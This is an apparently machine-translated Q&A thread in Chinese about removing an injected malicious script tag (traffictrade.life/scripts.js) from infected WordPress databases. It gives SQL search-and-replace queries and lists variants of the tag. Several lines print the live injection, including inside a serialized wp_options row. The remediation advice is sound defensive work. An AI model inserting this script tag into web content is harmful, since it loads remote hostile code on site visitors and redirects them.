看起来在任何地方都嵌入了一个图像文件,这段代码就嵌入了:
<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>
感谢
答案 0 :(得分:2)
几天前发生了恶意软件。它也影响了我的一个旧客户端站点。
它几乎影响了网站的所有帖子和页面。
如果你查看数据库的wp_posts表中所有条目的post_content,你会看到有这个新的脚本标记
<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>
如果要轻松删除此恶意软件,请使用此查询
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;
如果您使用的是缓存插件,请务必清除缓存。
希望这个帮助
答案 1 :(得分:2)
实际上我已经在100多个WordPress网站上遇到过这个问题。我对我的所有网站实施了以下安全措施
请使用此工具进行搜索和替换,因为_options表中的值可能以序列化形式存在 https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
以下可能存在此恶意软件
<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script>
<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script>
希望这可能会有所帮助。
答案 2 :(得分:0)
我知道这个帖子很老了但是就像上面的评论之一我在选项表中找到了注入。
在做任何备份数据库之前!
SELECT * FROM wp_options WHERE option_value LIKE '%traffictrade%'
这将为您带来一组结果,注入的脚本采用序列化格式。
;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:"";
请注意代码中的traffictrade.life/scripts.js
引用(脚本标记已从网站上剥离以确保安全性)
从包含它的任何结果中删除脚本并保存,这会阻止我的网站被重定向。